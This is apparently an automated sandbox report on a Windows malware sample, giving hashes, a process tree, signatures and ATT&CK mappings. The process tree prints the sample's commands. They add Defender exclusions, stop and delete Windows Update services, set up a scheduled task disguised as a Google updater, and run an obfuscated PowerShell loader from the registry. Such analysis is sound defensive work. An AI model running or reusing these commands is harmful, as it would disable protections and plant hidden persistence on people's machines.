Analysis

  • max time kernel
    15s
  • max time network
    76s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    16-11-2022 21:14

General

  • Target

    dmi1dfg7n.exe

  • Size

    2.8MB

  • MD5

    9253ed091d81e076a3037e12af3dc871

  • SHA1

    ec02829a25b3bf57ad061bbe54180d0c99c76981

  • SHA256

    78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859

  • SHA512

    29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4

  • SSDEEP

    49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6

Score
10/10

Malware Config

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • Stops running service(s) 3 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 41 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe
    "C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Drops file in Program Files directory
    • Suspicious use of WriteProcessMemory
    PID:4460
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4848
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4452
      • C:\Windows\system32\sc.exe
        sc stop UsoSvc
        3⤵
        • Launches sc.exe
        PID:1968
      • C:\Windows\system32\sc.exe
        sc stop WaaSMedicSvc
        3⤵
        • Launches sc.exe
        PID:1528
      • C:\Windows\system32\sc.exe
        sc stop wuauserv
        3⤵
        • Launches sc.exe
        PID:3924
      • C:\Windows\system32\sc.exe
        sc stop bits
        3⤵
        • Launches sc.exe
        PID:2400
      • C:\Windows\system32\sc.exe
        sc stop dosvc
        3⤵
        • Launches sc.exe
        PID:2332
      • C:\Windows\system32\reg.exe
        reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
        3⤵
          PID:3004
        • C:\Windows\system32\reg.exe
          reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
          3⤵
            PID:4664
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
            3⤵
            • Modifies security service
            PID:4348
          • C:\Windows\system32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
            3⤵
              PID:4548
            • C:\Windows\system32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
              3⤵
                PID:3412
            • C:\Windows\SYSTEM32\cmd.exe
              cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:4616
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:1776
              • C:\Windows\system32\powercfg.exe
                powercfg /x -hibernate-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:212
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-ac 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:3708
              • C:\Windows\system32\powercfg.exe
                powercfg /x -standby-timeout-dc 0
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:4280
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:884
            • C:\Windows\system32\dialer.exe
              C:\Windows\system32\dialer.exe
              2⤵
              • Drops file in Windows directory
              PID:2044
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell <#wajvhwink#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }
              2⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:1468
              • C:\Windows\system32\schtasks.exe
                "C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC
                3⤵
                  PID:3976
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
              C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
              1⤵
                PID:1740
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
                1⤵
                  PID:1852
                • C:\Program Files\Google\Chrome\updater.exe
                  "C:\Program Files\Google\Chrome\updater.exe"
                  1⤵
                    PID:3176
                  • C:\Windows\System32\dllhost.exe
                    C:\Windows\System32\dllhost.exe /Processid:{583c9542-9d5a-42bc-9854-8534e535f990}
                    1⤵
                      PID:1128

                    Network

                    MITRE ATT&CK Matrix ATT&CK v6

                    Persistence

                    Modify Existing Service

                    2
                    T1031

                    Defense Evasion

                    Modify Registry

                    1
                    T1112

                    Impair Defenses

                    1
                    T1562

                    Impact

                    Service Stop

                    1
                    T1489

                    Replay Monitor

                    Loading Replay Monitor...

                    Downloads

                    • C:\Program Files\Google\Chrome\updater.exe
                      Filesize

                      2.8MB

                      MD5

                      eb27bb8cfa99d659e4fe023e9002ecd1

                      SHA1

                      c783400302fdfae0518269c5a5a8d4bad29f42a3

                      SHA256

                      9c01d90543458567c4737731ee6754cc209e4bb78ff648eb75c4d23be261ef2f

                      SHA512

                      ab5ad3c094ed1f094aa82d80d298e6d0ab15a94b58b007dbe8a6219fe8498569b5d9013d770bd9910f177f94f2639d84650655e8f60113051e98b386c49c36a2

                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                      Filesize

                      2KB

                      MD5

                      d85ba6ff808d9e5444a4b369f5bc2730

                      SHA1

                      31aa9d96590fff6981b315e0b391b575e4c0804a

                      SHA256

                      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

                      SHA512

                      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      944B

                      MD5

                      6d3e9c29fe44e90aae6ed30ccf799ca8

                      SHA1

                      c7974ef72264bbdf13a2793ccf1aed11bc565dce

                      SHA256

                      2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

                      SHA512

                      60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                      Filesize

                      1KB

                      MD5

                      2e78327bb319bf3f3702d38dd5b6ee41

                      SHA1

                      64c987dad9b79d8b20d9c9f473325771aaa7a952

                      SHA256

                      614bebf127fe6b4b8a0458f42e3582e03880235f1f2d9b7de26dbc440521dda6

                      SHA512

                      d58c03e0ade885b90be268a0e24a93664d4eec05ac29db1c9a4dca066c02317bcd5f70586213f0ed10f4ea33970dc5f811a452320c92a55ac39f67026285e9ef

                    • memory/212-143-0x0000000000000000-mapping.dmp
                    • memory/600-183-0x00007FFB9B4D0000-0x00007FFB9B4E0000-memory.dmp
                      Filesize

                      64KB

                    • memory/884-138-0x0000000000000000-mapping.dmp
                    • memory/884-142-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/884-156-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/1128-172-0x0000000140000000-0x0000000140042000-memory.dmp
                      Filesize

                      264KB

                    • memory/1128-173-0x0000000140000000-0x0000000140042000-memory.dmp
                      Filesize

                      264KB

                    • memory/1128-176-0x00007FFBDB450000-0x00007FFBDB645000-memory.dmp
                      Filesize

                      2.0MB

                    • memory/1128-170-0x00000001400033F4-mapping.dmp
                    • memory/1128-169-0x0000000140000000-0x0000000140042000-memory.dmp
                      Filesize

                      264KB

                    • memory/1128-178-0x00007FFBDAF50000-0x00007FFBDB00E000-memory.dmp
                      Filesize

                      760KB

                    • memory/1128-181-0x0000000140000000-0x0000000140042000-memory.dmp
                      Filesize

                      264KB

                    • memory/1128-182-0x00007FFBDB450000-0x00007FFBDB645000-memory.dmp
                      Filesize

                      2.0MB

                    • memory/1468-158-0x0000000000000000-mapping.dmp
                    • memory/1468-160-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/1468-162-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/1528-144-0x0000000000000000-mapping.dmp
                    • memory/1740-164-0x0000000003800000-0x0000000003836000-memory.dmp
                      Filesize

                      216KB

                    • memory/1740-165-0x0000000003F90000-0x00000000045B8000-memory.dmp
                      Filesize

                      6.2MB

                    • memory/1740-174-0x0000000003E90000-0x0000000003EF6000-memory.dmp
                      Filesize

                      408KB

                    • memory/1740-175-0x0000000004770000-0x00000000047D6000-memory.dmp
                      Filesize

                      408KB

                    • memory/1740-171-0x0000000003DF0000-0x0000000003E12000-memory.dmp
                      Filesize

                      136KB

                    • memory/1776-140-0x0000000000000000-mapping.dmp
                    • memory/1852-177-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/1852-168-0x00007FFBDAF50000-0x00007FFBDB00E000-memory.dmp
                      Filesize

                      760KB

                    • memory/1852-167-0x00007FFBDB450000-0x00007FFBDB645000-memory.dmp
                      Filesize

                      2.0MB

                    • memory/1852-179-0x00007FFBDB450000-0x00007FFBDB645000-memory.dmp
                      Filesize

                      2.0MB

                    • memory/1852-166-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/1852-180-0x00007FFBDAF50000-0x00007FFBDB00E000-memory.dmp
                      Filesize

                      760KB

                    • memory/1968-139-0x0000000000000000-mapping.dmp
                    • memory/2044-157-0x00007FF6F9701844-mapping.dmp
                    • memory/2332-150-0x0000000000000000-mapping.dmp
                    • memory/2400-149-0x0000000000000000-mapping.dmp
                    • memory/3004-151-0x0000000000000000-mapping.dmp
                    • memory/3412-155-0x0000000000000000-mapping.dmp
                    • memory/3708-145-0x0000000000000000-mapping.dmp
                    • memory/3924-146-0x0000000000000000-mapping.dmp
                    • memory/3976-161-0x0000000000000000-mapping.dmp
                    • memory/4280-148-0x0000000000000000-mapping.dmp
                    • memory/4348-153-0x0000000000000000-mapping.dmp
                    • memory/4452-136-0x0000000000000000-mapping.dmp
                    • memory/4548-154-0x0000000000000000-mapping.dmp
                    • memory/4616-137-0x0000000000000000-mapping.dmp
                    • memory/4664-152-0x0000000000000000-mapping.dmp
                    • memory/4848-132-0x0000000000000000-mapping.dmp
                    • memory/4848-135-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/4848-134-0x00007FFBBCCE0000-0x00007FFBBD7A1000-memory.dmp
                      Filesize

                      10.8MB

                    • memory/4848-133-0x00000160A3D30000-0x00000160A3D52000-memory.dmp
                      Filesize

                      136KB